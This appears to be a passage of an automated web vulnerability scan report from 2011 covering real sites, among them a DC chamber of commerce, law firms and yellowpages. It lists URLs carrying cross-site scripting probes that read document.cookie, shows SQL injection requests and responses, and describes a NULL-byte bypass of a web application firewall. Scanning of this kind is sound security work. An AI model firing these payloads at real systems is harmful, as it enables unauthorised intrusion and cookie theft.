16.53. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png

16.54. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png

16.55. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG

16.56. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png

16.57. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG

16.58. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG

16.59. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG

16.60. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG

16.61. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG

16.62. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif

16.63. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif

16.64. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif

16.65. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif

16.66. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif

16.67. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif

16.68. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif

16.69. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif

16.70. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif

16.71. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg

16.72. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif

16.73. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif

16.74. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif

16.75. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg

16.76. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif

16.77. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif

16.78. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css

16.79. http://www.ebglaw.com/404.aspx

16.80. http://www.ebglaw.com/showoffice.aspx

16.81. http://www.hoganlovells.com/

16.82. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/

16.83. http://www.hoganlovells.com/aboutus/history/

16.84. http://www.hoganlovells.com/aboutus/overview/

16.85. http://www.hoganlovells.com/de/

16.86. http://www.hoganlovells.com/es/

16.87. http://www.hoganlovells.com/fr/

16.88. http://www.hoganlovells.com/industries/

16.89. http://www.hoganlovells.com/ja/

16.90. http://www.hoganlovells.com/newsmedia/awardsrankings/

16.91. http://www.hoganlovells.com/newsmedia/fastfacts/

16.92. http://www.hoganlovells.com/newsmedia/newspubs/

16.93. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx

16.94. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx

16.95. http://www.hoganlovells.com/newsmedia/timeline/

16.96. http://www.hoganlovells.com/offices/

16.97. http://www.hoganlovells.com/ourpeople/

16.98. http://www.hoganlovells.com/ourpeople/List.aspx

16.99. http://www.hoganlovells.com/practiceAreas/area.aspx

16.100. http://www.hoganlovells.com/practiceareas/

16.101. http://www.hoganlovells.com/ru/

16.102. http://www.hoganlovells.com/splash/alumni/

16.103. http://www.hoganlovells.com/zh-CHS/

16.104. http://www.info.com/washington%20dc%20law%20firms

16.105. http://www.kasimer-ittig.com/

16.106. http://www.local.com/results.aspx

16.107. http://www.local.com/results.aspx

16.108. http://www.skadden.com/

16.109. http://www.skadden.com/2011insights.cfm

16.110. http://www.skadden.com/alumni/Index.cfm

16.111. http://www.skadden.com/index.cfm

16.112. http://www.usdirectory.com/gypr.aspx

16.113. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

16.114. http://www.vault.com/wps/portal/usa/rankings/individual

16.115. http://www.weil.com/

16.116. http://www.wileyrein.com/

16.117. http://www.wileyrein.com/index.cfm

16.118. http://www.wileyrein.com/x22

16.119. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

16.120. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

16.121. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

16.122. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/a

17. Email addresses disclosed

17.1. http://dcregistry.com/computer.html

17.2. http://dcregistry.com/jobs.html

17.3. http://dcregistry.com/lawfirms.html

17.4. http://dcregistry.com/other.html

17.5. http://dcregistry.com/shopping.html

17.6. http://financaspessoais.blog.br/wp-content/plugins/wpaudio-mp3-player/wpaudio.min.js

17.7. http://landesm.gfi.com/event-log-analysis-sm/

17.8. https://login.yahoo.com/config/login

17.9. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

17.10. http://rafael.adm.br/wp-content/themes/mainstream/includes/js/pngfix.js

17.11. http://skaddenpractices.skadden.com/fca/

17.12. http://skaddenpractices.skadden.com/hc/

17.13. http://skaddenpractices.skadden.com/sec/index.php

17.14. http://twittercounter.com/rafaelp

17.15. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm

17.16. http://www.arnoldporter.com/events.cfm

17.17. http://www.arnoldporter.com/globals_privacy_policy.cfm

17.18. http://www.cov.com/en-US/regions/middle_east/

17.19. http://www.cov.com/health_care/health_care_reform/

17.20. http://www.cov.com/industry/financial_services/dodd_frank/

17.21. http://www.cov.com/ja-JP/practice/region.aspx

17.22. http://www.cov.com/ko-KR/practice/region.aspx

17.23. http://www.cov.com/zh-CN/practice/region.aspx

17.24. http://www.dcchamber.org/chamber/memberDetail.asp

17.25. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/cache/sql/fba/fs_1.jpg

17.26. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AIR_Logo_hotsoup.PNG

17.27. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AUlogo.PNG

17.28. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Akridge.PNG

17.29. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Cardinal.PNG

17.30. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Carefirst.PNG

17.31. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CityPaper.png

17.32. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Copy%20of%20ACS%20Logo.PNG

17.33. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CordiaLogo.PNG

17.34. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/DCLottery.png

17.35. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/FEDEX_CORP_LOGO1%20(2).PNG

17.36. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/GWU_Logo.PNG

17.37. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/HollandKnight.PNG

17.38. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Howard%20University.PNG

17.39. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MacFarlane%20Partners.PNG

17.40. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MedStar.PNG

17.41. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Miller&Long.gif

17.42. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/PNC_RGB.PNG

17.43. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/ReedSmith.PNG

17.44. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/SecuritasLogo.PNG

17.45. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/UDC.PNG

17.46. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png

17.47. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG

17.48. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG

17.49. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG

17.50. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG

17.51. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png

17.52. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png

17.53. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png

17.54. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG

17.55. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png

17.56. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG

17.57. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG

17.58. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG

17.59. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG

17.60. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG

17.61. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif

17.62. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif

17.63. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif

17.64. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif

17.65. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif

17.66. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif

17.67. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif

17.68. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif

17.69. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif

17.70. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg

17.71. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif

17.72. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif

17.73. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif

17.74. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg

17.75. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif

17.76. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif

17.77. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css

17.78. http://www.ebglaw.com/js/jquery.mousewheel.js

17.79. http://www.ebglaw.com/showoffice.aspx

17.80. http://www.fulbright.com/aop

17.81. http://www.fulbright.com/fjLib/js/prototype.js

17.82. http://www.fulbright.com/index.cfm

17.83. http://www.fulbright.com/industries

17.84. http://www.hoganlovells.com/FCWSite/Include/incFlashDetect.js

17.85. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx

17.86. http://www.hoganlovells.com/ourpeople/List.aspx

17.87. http://www.local.com/business/v3/js/globalbusiness_3_5.js

17.88. http://www.local.com/js/s_code.js

17.89. http://www.political.cov.com/

17.90. http://www.skadden.com/Index.cfm

17.91. http://www.vault.com/scripts/jquery.swapimage.min.js

17.92. http://www.vault.com/scripts/main.js

17.93. http://www.wileyrein.com/js/script.js

18. Credit card numbers disclosed

18.1. http://www.hoganlovells.com/files/Publication/7871edd4-f660-4f47-811a-539ef0d25b84/Presentation/PublicationAttachment/04e62785-8fe2-40c3-a8cb-556982a16ea7/FDPF1_final.pdf

18.2. http://www.hoganlovells.com/ourpeople/List.aspx

19. Cacheable HTTPS response

20. HTML does not specify charset

20.1. http://dcregistry.com/cgi-bin/surveys/survey.cgi

20.2. http://dcregistry.com/cgi-bin/wbn2/wbn.pl

20.3. http://dcregistry.com/lawfirms.html

20.4. http://dcregistry.com/users/CVCalhoun/index.html

20.5. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json

20.6. http://ds.addthis.com/red/psi/sites/www.wileyrein.com/p.json

20.7. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

20.8. http://skaddenpractices.skadden.com/

20.9. http://skaddenpractices.skadden.com/sec/images/tools_doc.gif

20.10. http://skaddenpractices.skadden.com/sec/images/tools_mail.gif

20.11. http://skaddenpractices.skadden.com/sec/images/tools_phone.gif

20.12. http://skaddenpractices.skadden.com/sec/scripts/resize.gif

20.13. http://www.dcregistry.com/ns6side.htm

20.14. http://www.fulbright.com/index.cfm

20.15. http://www.learnestateplanning.com/

20.16. http://www.vault.com/favicon.ico

21. HTML uses unrecognised charset

21.1. http://www.ebglaw.com/404.aspx

21.2. http://www.ebglaw.com/showoffice.aspx

22. Content type incorrectly stated

22.1. http://lt.navegg.com/g.lt

22.2. http://twittercounter.com/embed/

22.3. http://v6test.cdn.att.net/special.jpg

22.4. http://wsdsapi.infospace.com/infomaster/widgets

22.5. http://www.arnoldporter.com//images/iTunesButton.jpg

22.6. http://www.fulbright.com/index.cfm

22.7. http://www.kasimer-ittig.com/domainserve/puview

22.8. http://www.kasimer-ittig.com/domainserve/viewStats

22.9. http://www.usdirectory.com/istat.aspx

22.10. http://www.vault.com/com.vault.home.portlets/homepage_flash.swf

23. Content type is not specified



1. SQL injection  next
There are 10 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://lt.navegg.com/g.lt [ltcid cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://lt.navegg.com
Path:   /g.lt

Issue detail

The ltcid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ltcid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltcid=547362597'

Response 1

HTTP/1.1 500 Internal Server Error
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Content-Type: text/html
Content-Length: 369
Date: Wed, 19 Jan 2011 18:01:20 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

Request 2

GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltcid=547362597''

Response 2

HTTP/1.1 200 OK
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 20-Jan-2011 06:01:21 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 18:01:21 GMT
Server: lighttpd/1.4.19
Content-Length: 45

tuple=" ";
ltload();
ltsetid("547362597''");

1.2. http://navegg.boo-box.com/sc.lt [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://navegg.boo-box.com
Path:   /sc.lt

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /sc.lt?id=' HTTP/1.1
Host: navegg.boo-box.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Content-Type: text/html
Content-Length: 369
Date: Wed, 19 Jan 2011 18:09:52 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

Request 2

GET /sc.lt?id='' HTTP/1.1
Host: navegg.boo-box.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: inf=''_0_0_0_0_0_0_0-0-0-0-0; path=/; domain=.boo-box.com; expires=Wed, 19-Jan-2012 12:09:52 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 18:09:52 GMT
Server: lighttpd/1.4.19
Content-Length: 23


var NaveggBoobox=1;

1.3. http://v6test.cdn.att.net/image/special2.jpg [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://v6test.cdn.att.net
Path:   /image/special2.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /image/special2.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 16:50:03 GMT
Last-Modified: Wed, 19 Jan 2011 16:50:03 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 5532
Content-Type: text/html
X-Cache: MISS from 12.120.38.41
Age: 35
X-Cache: HIT from 12.120.79.21
Via: 1.1 12.120.38.41:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.21:80 (cache/2.6.2.2.16.ATT)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>AT&a
...[SNIP]...
<strong>http://www.yellowpages.com/Washington-DC74302&#037;3Cimg&#037;20src&#037;3da&#037;20onerror&#037;3dalert&#040;document.cookie&#041;&#037;3E9c7a66be0e0/Attorneys</strong>
...[SNIP]...

Request 2

GET /image/special2.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 16:49:53 GMT
Last-Modified: Wed, 19 Jan 2011 16:49:53 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 5422
Content-Type: text/html
X-Cache: HIT from 12.120.38.42
Age: 45
X-Cache: HIT from 12.120.79.20
Via: 1.1 12.120.38.42:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.20:80 (cache/2.6.2.2.16.ATT)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>AT&a
...[SNIP]...

1.4. http://www.ebglaw.com/showoffice.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

